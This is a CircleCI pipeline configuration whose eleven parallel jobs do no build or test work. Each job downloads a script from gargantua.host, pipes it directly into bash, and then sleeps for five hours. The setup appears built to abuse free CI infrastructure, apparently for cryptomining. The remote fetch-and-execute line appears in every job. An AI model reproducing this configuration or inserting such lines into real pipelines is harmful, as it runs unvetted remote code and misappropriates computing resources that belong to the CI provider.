version: 2.1

jobs:
  stagetrihula:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cra.sh | bash -
      - run: 
            command: sleep 18000
            no_output_timeout: 5h

  stagetrihula1:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cra.sh | bash -
      - run: 
            command: sleep 18000
            no_output_timeout: 5h

  stagetrihula2:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cra.sh | bash -
      - run: 
            command: sleep 18000
            no_output_timeout: 5h

  stagetrihula3:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cra.sh | bash -
      - run: 
            command: sleep 18000
            no_output_timeout: 5h

  stagetrihula4:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cra.sh | bash -
      - run: 
            command: sleep 18000
            no_output_timeout: 5h

  stagetrihula5:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cra.sh | bash -
      - run: 
            command: sleep 18000
            no_output_timeout: 5h

  stagetrihula6:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cra.sh | bash -
      - run: 
            command: sleep 18000
            no_output_timeout: 5h

  stagetrihula7:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cra.sh | bash -
      - run: 
            command: sleep 18000
            no_output_timeout: 5h

  stagetrihula8:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cra.sh | bash -
      - run: 
            command: sleep 18000
            no_output_timeout: 5h

  stagetrihula9:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cra.sh | bash -
      - run: 
            command: sleep 18000
            no_output_timeout: 5h

  stagetrihula10:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cra.sh | bash -
      - run: 
            command: sleep 18000
            no_output_timeout: 5h

workflows:
  main:
    jobs:
      - stagetrihula
      - stagetrihula1
      - stagetrihula2
      - stagetrihula3
      - stagetrihula4
      - stagetrihula5
      - stagetrihula6
      - stagetrihula7
      - stagetrihula8
      - stagetrihula9
      - stagetrihula10